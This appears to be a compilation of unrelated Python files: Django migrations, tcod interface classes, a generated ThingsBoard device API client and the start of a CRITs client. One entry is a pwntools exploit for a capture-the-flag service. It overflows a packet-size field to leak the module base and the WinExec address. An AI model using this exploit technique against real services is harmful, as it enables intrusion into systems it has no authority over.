                ('post_related_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)),
            ],
            bases=('base.base',),
        ),
    ]
|
8,128 | 4fff64a62776a9d1b06cc11d5e55fc00f6787338 | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
H2HC application created for a CTF.
Exploit written by M4v3r1ck (helvio_junior[at]hotmail[dot]com)
'''
from pwn import *
import os
context(arch='amd64', os='windows', log_level='debug')
host= "192.168.255.201"
port = 54345
# Stage 1: trigger the vulnerability once (overflow-sized packet).
log.info("Enviando estágio 1")
payload1 = "H2HC" #cookie
payload1 += "\xff\x00\x00\x00" #size to trigger the vul
payload1 += "\x41" * 0xff
payload1 += "\n"
p = remote(host, port)
p.send(payload1)
p.recv(4096)
p.close()
# Stage 2: resend with extra trailing bytes to make the service echo
# back adjacent memory containing useful pointers.
log.info("Enviando estágio 2")
payload2 = "H2HC"
payload2 += "\xff\x00\x00\x00"
payload2 += "A" * 0x100
payload2 += "\x04\x09\x00\x00"
p1 = remote(host, port)
p1.send(payload2)
p1.recvuntil("H2HC19 message:")
# Leak an address from the application's own execution flow (.text section).
p1.recv(0x10d)
ld1 = p1.recv(8)
leak_local_addr = u64(ld1.ljust(8, "\x00"))
# Mask low bits to approximate the module base address.
base_addr = leak_local_addr & 0xffffffffffff0000
log.info("Local leak : %s" % hex(leak_local_addr))
log.info("App Base Addr : %s" % hex(base_addr))
# Leak the address of the WinExec function.
p1.recv(0x7f0) # offset from position zero up to the bytes 90 f0 7e 0a fa 7f
lead_data = p1.recv(8)
p1.recv(4096)
leak = u64(lead_data.ljust(8, "\x00"))
log.info("WinExec addr leak : %s" % hex(leak))
|
8,129 | 0c7f2412fe9a83d70d41fbc4bbaf135e6bc4149a | # Generated by Django 2.2.6 on 2019-11-05 02:28
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds a nullable `date` field to the Appointment model."""
    dependencies = [
        ('drchrono', '0011_patient_cell_phone'),
    ]
    operations = [
        migrations.AddField(
            model_name='appointment',
            name='date',
            # null=True with default None: existing rows need no backfill.
            field=models.DateTimeField(default=None, null=True),
        ),
    ]
|
8,130 | 321147f2e2d8caf6d9224e2a8969f51ded48baf7 | # Generated by Django 3.1.5 on 2021-02-24 18:34
from django.db import migrations, models
import stdimage.models
class Migration(migrations.Migration):
    """Creates the `historico` model and adds title/description fields
    to the existing `arquivopdf` model.
    """
    dependencies = [
        ('Site', '0004_arquivopdf'),
    ]
    operations = [
        migrations.CreateModel(
            name='historico',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Audit fields: creation date, last-modified date, active flag.
                ('criados', models.DateField(auto_now_add=True, verbose_name='Criação')),
                ('modificado', models.DateField(auto_now=True, verbose_name='Atualização')),
                ('ativo', models.BooleanField(default=True, verbose_name='Ativo?')),
                ('titulo', models.CharField(max_length=100, verbose_name='Título')),
                ('imagem', stdimage.models.StdImageField(upload_to='img_historico', verbose_name='Imagem')),
                ('subtitulo01', models.CharField(max_length=100, verbose_name='Subtítulo01')),
                ('descricao01', models.TextField(max_length=200, verbose_name='Subtítulo01 Descrição')),
                ('subtitulo02', models.CharField(max_length=100, verbose_name='Subtítulo02')),
                ('descricao02', models.TextField(max_length=200, verbose_name='Subtítulo02 Descrição')),
                # Three label/value counter pairs displayed on the page.
                ('contador01', models.CharField(max_length=50, verbose_name='contador01')),
                ('valor01', models.TextField(max_length=6, verbose_name='valor contador01')),
                ('contador02', models.CharField(max_length=50, verbose_name='contador02')),
                ('valor02', models.TextField(max_length=6, verbose_name='valor contador02')),
                ('contador03', models.CharField(max_length=50, verbose_name='contador03')),
                ('valor03', models.TextField(max_length=6, verbose_name='valor contador03')),
                ('subtitulo03', models.CharField(max_length=100, verbose_name='Subtítulo03')),
                ('descricao03', models.TextField(max_length=200, verbose_name='Subtítulo03 Descrição')),
            ],
            options={
                'verbose_name': 'Notícia',
                'verbose_name_plural': 'Noticias',
            },
        ),
        migrations.AddField(
            model_name='arquivopdf',
            name='descricao',
            # default=1 only backfills existing rows; preserve_default=False
            # removes the default from the field definition afterwards.
            field=models.TextField(default=1, max_length=200, verbose_name='Descrição'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='arquivopdf',
            name='titulo',
            field=models.CharField(default=1, max_length=100, verbose_name='Título'),
            preserve_default=False,
        ),
    ]
|
8,131 | e37f958191c9481c6664e90c17f43419a0b5b606 | from __future__ import annotations
from typing import TYPE_CHECKING
import abc
import tcod.event
if TYPE_CHECKING:
from tcodplus.canvas import Canvas
from tcodplus.event import CanvasDispatcher
class IDrawable(abc.ABC):
    """Interface for objects that can draw themselves onto a Canvas."""

    @property
    @abc.abstractmethod
    def force_redraw(self) -> bool:
        """bool: whether the drawable must be redrawn on the next pass."""

    # BUG FIX: the setter was decorated `@property` on top of
    # `@force_redraw.setter`, which wrapped the resulting property object in
    # another property (no usable fset, abstractness lost). Use the same
    # `@<name>.setter` + `@abc.abstractmethod` pattern as IKeyboardFocusable
    # and IUpdatable elsewhere in this module.
    @force_redraw.setter
    @abc.abstractmethod
    def force_redraw(self, value: bool) -> None:
        ...

    @abc.abstractmethod
    def draw(self, dest: Canvas) -> None:
        """Draw this object onto *dest*."""

    @abc.abstractmethod
    def base_drawing(self, console: tcod.console.Console) -> None:
        """Perform the low-level drawing onto a tcod console."""
class IFocusable(abc.ABC):
    """Interface for elements that expose a focus-event dispatcher."""

    @property
    @abc.abstractmethod
    def focus_dispatcher(self) -> CanvasDispatcher:
        """CanvasDispatcher: dispatcher that receives this element's focus events."""
class IMouseFocusable(IFocusable):
    """Focusable element whose focus state is driven by mouse motion."""

    @abc.abstractmethod
    def mousefocus(self, event: tcod.event.MouseMotion) -> bool:
        """Return whether the given mouse-motion event focuses this element."""
class IKeyboardFocusable(IFocusable):
    """Focusable element that can hold or request keyboard focus."""

    @property
    @abc.abstractmethod
    def kbdfocus(self) -> bool:
        """bool: whether this element currently holds keyboard focus."""

    @kbdfocus.setter
    @abc.abstractmethod
    def kbdfocus(self, val: bool) -> None:
        ...

    @property
    @abc.abstractmethod
    def kbdfocus_requested(self) -> bool:
        """bool: whether this element has requested keyboard focus."""

    @kbdfocus_requested.setter
    @abc.abstractmethod
    def kbdfocus_requested(self, val: bool) -> None:
        ...
class IUpdatable(abc.ABC):
    """Interface for objects that are refreshed via an update step."""

    @property
    @abc.abstractmethod
    def should_update(self) -> bool:
        """bool: whether update() should run on the next pass."""

    @should_update.setter
    @abc.abstractmethod
    def should_update(self, value: bool) -> None:
        ...

    @abc.abstractmethod
    def update(self) -> None:
        """Perform this object's update step."""
|
8,132 | 9b30075183cf9611307afa74aa45979872e7e9d5 | # coding: utf-8
# Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api.api_ce import DeviceControllerApi
# NOTE(review): this PE class deliberately shadows the imported CE class of
# the same name, extending it with PE-only endpoints — presumably the
# tb_rest_client convention; verify against the package layout.
class DeviceControllerApi(DeviceControllerApi):
    """NOTE: This class is auto generated by the swagger code generator program.

    Ref: https://github.com/swagger-api/swagger-codegen
    """
    def __init__(self, api_client=None):
        # Reuse the CE base-class initialisation with the shared api_client.
        super(DeviceControllerApi, self).__init__(api_client)
    def claim_device_using_post(self, device_name, **kwargs):  # noqa: E501
        """claimDevice  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.claim_device_using_post(device_name, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str device_name: deviceName (required)
        :param ClaimRequest claim_request: claimRequest
        :param str sub_customer_id: subCustomerId
        :return: DeferredResultResponseEntity
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Always request the decoded body only (not the (body, status,
        # headers) tuple); the async path returns the worker thread instead.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.claim_device_using_post_with_http_info(device_name, **kwargs)  # noqa: E501
        else:
            (data) = self.claim_device_using_post_with_http_info(device_name, **kwargs)  # noqa: E501
            return data
    def claim_device_using_post_with_http_info(self, device_name, **kwargs):  # noqa: E501
        """claimDevice  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.claim_device_using_post_with_http_info(device_name, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str device_name: deviceName (required)
        :param ClaimRequest claim_request: claimRequest
        :param str sub_customer_id: subCustomerId
        :return: DeferredResultResponseEntity
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # NOTE(review): all_params is assembled but never used to reject
        # unknown kwargs in this generated variant.
        all_params = ['device_name', 'claim_request', 'sub_customer_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshot holds the named args plus the kwargs dict;
        # flatten **kwargs into it so all parameters live in one mapping.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'device_name' is set
        if ('device_name' not in params or
                params['device_name'] is None):
            raise ValueError("Missing the required parameter `device_name` when calling `claim_device_using_post`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'device_name' in params:
            path_params['deviceName'] = params['device_name']  # noqa: E501
        query_params = []
        if 'sub_customer_id' in params:
            query_params.append(('subCustomerId', params['sub_customer_id']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        if 'claim_request' in params:
            body_params = params['claim_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501
        # First argument is an RFC 6570-style URL template expanded by the client.
        return self.api_client.call_api(
            '/api/customer/device/{deviceName}/claim{?subCustomerId}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='DeferredResultResponseEntity',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def get_customer_devices_using_get(self, customer_id, page_size, page, **kwargs):  # noqa: E501
        """getCustomerDevices  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.get_customer_devices_using_get(customer_id, page_size, page, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str customer_id: customerId (required)
        :param str page_size: pageSize (required)
        :param str page: page (required)
        :param str type: type
        :param str text_search: textSearch
        :param str sort_property: sortProperty
        :param str sort_order: sortOrder
        :return: PageDataDevice
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Return the decoded body only; the async path returns the thread.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, **kwargs)  # noqa: E501
        else:
            (data) = self.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, **kwargs)  # noqa: E501
            return data
    def get_customer_devices_using_get_with_http_info(self, customer_id, page_size, page, **kwargs):  # noqa: E501
        """getCustomerDevices  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str customer_id: customerId (required)
        :param str page_size: pageSize (required)
        :param str page: page (required)
        :param str type: type
        :param str text_search: textSearch
        :param str sort_property: sortProperty
        :param str sort_order: sortOrder
        :return: PageDataDevice
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['customer_id', 'page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Flatten **kwargs into the locals() snapshot (generated-code idiom).
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'customer_id' is set
        if ('customer_id' not in params or
                params['customer_id'] is None):
            raise ValueError("Missing the required parameter `customer_id` when calling `get_customer_devices_using_get`")  # noqa: E501
        # verify the required parameter 'page_size' is set
        if ('page_size' not in params or
                params['page_size'] is None):
            raise ValueError("Missing the required parameter `page_size` when calling `get_customer_devices_using_get`")  # noqa: E501
        # verify the required parameter 'page' is set
        if ('page' not in params or
                params['page'] is None):
            raise ValueError("Missing the required parameter `page` when calling `get_customer_devices_using_get`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'customer_id' in params:
            path_params['customerId'] = params['customer_id']  # noqa: E501
        query_params = []
        if 'type' in params:
            query_params.append(('type', params['type']))  # noqa: E501
        if 'text_search' in params:
            query_params.append(('textSearch', params['text_search']))  # noqa: E501
        if 'sort_property' in params:
            query_params.append(('sortProperty', params['sort_property']))  # noqa: E501
        if 'sort_order' in params:
            query_params.append(('sortOrder', params['sort_order']))  # noqa: E501
        if 'page_size' in params:
            query_params.append(('pageSize', params['page_size']))  # noqa: E501
        if 'page' in params:
            query_params.append(('page', params['page']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501
        return self.api_client.call_api(
            '/api/customer/{customerId}/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='PageDataDevice',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def get_devices_by_entity_group_id_using_get(self, entity_group_id, page_size, page, **kwargs):  # noqa: E501
        """getDevicesByEntityGroupId  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.get_devices_by_entity_group_id_using_get(entity_group_id, page_size, page, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str entity_group_id: entityGroupId (required)
        :param str page_size: Page size (required)
        :param str page: Page (required)
        :param str text_search: textSearch
        :param str sort_property: sortProperty
        :param str sort_order: sortOrder
        :return: PageDataDevice
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Return the decoded body only; the async path returns the thread.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, **kwargs)  # noqa: E501
        else:
            (data) = self.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, **kwargs)  # noqa: E501
            return data
    def get_devices_by_entity_group_id_using_get_with_http_info(self, entity_group_id, page_size, page, **kwargs):  # noqa: E501
        """getDevicesByEntityGroupId  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str entity_group_id: entityGroupId (required)
        :param str page_size: Page size (required)
        :param str page: Page (required)
        :param str text_search: textSearch
        :param str sort_property: sortProperty
        :param str sort_order: sortOrder
        :return: PageDataDevice
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['entity_group_id', 'page_size', 'page', 'text_search', 'sort_property', 'sort_order']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Flatten **kwargs into the locals() snapshot (generated-code idiom).
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'entity_group_id' is set
        if ('entity_group_id' not in params or
                params['entity_group_id'] is None):
            raise ValueError("Missing the required parameter `entity_group_id` when calling `get_devices_by_entity_group_id_using_get`")  # noqa: E501
        # verify the required parameter 'page_size' is set
        if ('page_size' not in params or
                params['page_size'] is None):
            raise ValueError("Missing the required parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`")  # noqa: E501
        # verify the required parameter 'page' is set
        if ('page' not in params or
                params['page'] is None):
            raise ValueError("Missing the required parameter `page` when calling `get_devices_by_entity_group_id_using_get`")  # noqa: E501
        # NOTE(review): the docstring types page_size/page as str, but these
        # comparisons against floats raise TypeError on Python 3 for str
        # values — callers must pass numbers here. Confirm intended type.
        if 'page_size' in params and params['page_size'] < 1.0:  # noqa: E501
            raise ValueError("Invalid value for parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `1.0`")  # noqa: E501
        if 'page' in params and params['page'] < 0.0:  # noqa: E501
            raise ValueError("Invalid value for parameter `page` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `0.0`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'entity_group_id' in params:
            path_params['entityGroupId'] = params['entity_group_id']  # noqa: E501
        query_params = []
        if 'text_search' in params:
            query_params.append(('textSearch', params['text_search']))  # noqa: E501
        if 'sort_property' in params:
            query_params.append(('sortProperty', params['sort_property']))  # noqa: E501
        if 'sort_order' in params:
            query_params.append(('sortOrder', params['sort_order']))  # noqa: E501
        if 'page_size' in params:
            query_params.append(('pageSize', params['page_size']))  # noqa: E501
        if 'page' in params:
            query_params.append(('page', params['page']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501
        return self.api_client.call_api(
            '/api/entityGroup/{entityGroupId}/devices{?textSearch,sortProperty,sortOrder,pageSize,page}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='PageDataDevice',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def get_tenant_devices_using_get(self, page_size, page, **kwargs):  # noqa: E501
        """getTenantDevices  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.get_tenant_devices_using_get(page_size, page, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str page_size: pageSize (required)
        :param str page: page (required)
        :param str type: type
        :param str text_search: textSearch
        :param str sort_property: sortProperty
        :param str sort_order: sortOrder
        :return: PageDataDevice
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Return the decoded body only; the async path returns the thread.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_tenant_devices_using_get_with_http_info(page_size, page, **kwargs)  # noqa: E501
        else:
            (data) = self.get_tenant_devices_using_get_with_http_info(page_size, page, **kwargs)  # noqa: E501
            return data
    def get_tenant_devices_using_get_with_http_info(self, page_size, page, **kwargs):  # noqa: E501
        """getTenantDevices  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.get_tenant_devices_using_get_with_http_info(page_size, page, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str page_size: pageSize (required)
        :param str page: page (required)
        :param str type: type
        :param str text_search: textSearch
        :param str sort_property: sortProperty
        :param str sort_order: sortOrder
        :return: PageDataDevice
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Flatten **kwargs into the locals() snapshot (generated-code idiom).
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'page_size' is set
        if ('page_size' not in params or
                params['page_size'] is None):
            raise ValueError("Missing the required parameter `page_size` when calling `get_tenant_devices_using_get`")  # noqa: E501
        # verify the required parameter 'page' is set
        if ('page' not in params or
                params['page'] is None):
            raise ValueError("Missing the required parameter `page` when calling `get_tenant_devices_using_get`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        if 'type' in params:
            query_params.append(('type', params['type']))  # noqa: E501
        if 'text_search' in params:
            query_params.append(('textSearch', params['text_search']))  # noqa: E501
        if 'sort_property' in params:
            query_params.append(('sortProperty', params['sort_property']))  # noqa: E501
        if 'sort_order' in params:
            query_params.append(('sortOrder', params['sort_order']))  # noqa: E501
        if 'page_size' in params:
            query_params.append(('pageSize', params['page_size']))  # noqa: E501
        if 'page' in params:
            query_params.append(('page', params['page']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501
        return self.api_client.call_api(
            '/api/tenant/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='PageDataDevice',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def get_user_devices_using_get(self, page_size, page, **kwargs):  # noqa: E501
        """getUserDevices  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.get_user_devices_using_get(page_size, page, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str page_size: pageSize (required)
        :param str page: page (required)
        :param str type: type
        :param str text_search: textSearch
        :param str sort_property: sortProperty
        :param str sort_order: sortOrder
        :return: PageDataDevice
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Return the decoded body only; the async path returns the thread.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_user_devices_using_get_with_http_info(page_size, page, **kwargs)  # noqa: E501
        else:
            (data) = self.get_user_devices_using_get_with_http_info(page_size, page, **kwargs)  # noqa: E501
            return data
    def get_user_devices_using_get_with_http_info(self, page_size, page, **kwargs):  # noqa: E501
        """getUserDevices  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.get_user_devices_using_get_with_http_info(page_size, page, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str page_size: pageSize (required)
        :param str page: page (required)
        :param str type: type
        :param str text_search: textSearch
        :param str sort_property: sortProperty
        :param str sort_order: sortOrder
        :return: PageDataDevice
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Flatten **kwargs into the locals() snapshot (generated-code idiom).
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'page_size' is set
        if ('page_size' not in params or
                params['page_size'] is None):
            raise ValueError("Missing the required parameter `page_size` when calling `get_user_devices_using_get`")  # noqa: E501
        # verify the required parameter 'page' is set
        if ('page' not in params or
                params['page'] is None):
            raise ValueError("Missing the required parameter `page` when calling `get_user_devices_using_get`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        if 'type' in params:
            query_params.append(('type', params['type']))  # noqa: E501
        if 'text_search' in params:
            query_params.append(('textSearch', params['text_search']))  # noqa: E501
        if 'sort_property' in params:
            query_params.append(('sortProperty', params['sort_property']))  # noqa: E501
        if 'sort_order' in params:
            query_params.append(('sortOrder', params['sort_order']))  # noqa: E501
        if 'page_size' in params:
            query_params.append(('pageSize', params['page_size']))  # noqa: E501
        if 'page' in params:
            query_params.append(('page', params['page']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501
        return self.api_client.call_api(
            '/api/user/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='PageDataDevice',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def save_device_using_post(self, device, **kwargs):  # noqa: E501
        """saveDevice  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.save_device_using_post(device, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param Device device: device (required)
        :param str access_token: accessToken
        :param str entity_group_id: entityGroupId
        :return: Device
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Return the decoded body only; the async path returns the thread.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.save_device_using_post_with_http_info(device, **kwargs)  # noqa: E501
        else:
            (data) = self.save_device_using_post_with_http_info(device, **kwargs)  # noqa: E501
            return data
    def save_device_using_post_with_http_info(self, device, **kwargs):  # noqa: E501
        """saveDevice  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.save_device_using_post_with_http_info(device, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param Device device: device (required)
        :param str access_token: accessToken
        :param str entity_group_id: entityGroupId
        :return: Device
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['device', 'access_token', 'entity_group_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Flatten **kwargs into the locals() snapshot (generated-code idiom).
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'device' is set
        if ('device' not in params or
                params['device'] is None):
            raise ValueError("Missing the required parameter `device` when calling `save_device_using_post`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        if 'access_token' in params:
            query_params.append(('accessToken', params['access_token']))  # noqa: E501
        if 'entity_group_id' in params:
            query_params.append(('entityGroupId', params['entity_group_id']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        if 'device' in params:
            body_params = params['device']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501
        return self.api_client.call_api(
            '/api/device{?accessToken,entityGroupId}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Device',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
|
8,133 | a505cc0e382554d65447a3fe3a56fac43c1964f2 | import datetime
import json
import logging
import requests
from lib.crits.exceptions import CRITsOperationalError
from lib.crits.vocabulary.indicators import IndicatorThreatTypes as itt
from lib.crits.vocabulary.indicators import IndicatorAttackTypes as iat
log = logging.getLogger()
class CRITsAPI():
    """Thin client for the CRITs REST API.

    :param api_url: Base URL of the API endpoint, e.g. ``https://crits/api/v1``.
    :param api_key: API key used to authenticate ``username``.
    :param username: CRITs username the API key belongs to.
    :param verify: Whether to verify TLS certificates (passed to requests).
    :param proxies: Optional requests-style proxies mapping.
    """

    # Maps public CRITs type names onto their REST collection endpoints.
    _TYPE_ENDPOINTS = {
        'Indicator': 'indicators',
        'Domain': 'domains',
        'IP': 'ips',
        'Sample': 'samples',
        'Event': 'events',
